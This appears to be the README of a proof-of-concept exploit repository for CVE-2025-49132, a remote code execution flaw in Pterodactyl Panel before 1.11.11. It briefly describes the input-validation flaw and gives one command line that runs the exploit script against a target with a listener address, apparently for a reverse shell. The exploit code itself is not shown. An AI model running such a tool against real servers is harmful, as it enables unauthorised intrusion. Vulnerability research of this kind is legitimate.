
This script exploits Remote Code Execution vulnerability in Pterodactyl Panel < 1.11.11
This repository contains a Proof of Concept (PoC) for CVE-2025-49132, a Remote Code Execution (RCE) vulnerability affecting Pterodactyl Panel < 1.11.11 This PoC was developed and tested in a controlled lab environment for research and educational purposes.
The vulnerability originates from insufficient validation of user-controlled input in a request handler, which allows unintended backend interaction. Under certain conditions, this can lead to remote command execution.
python3 exploit.py -t <target> -l <listener_ip> -p <listener_port>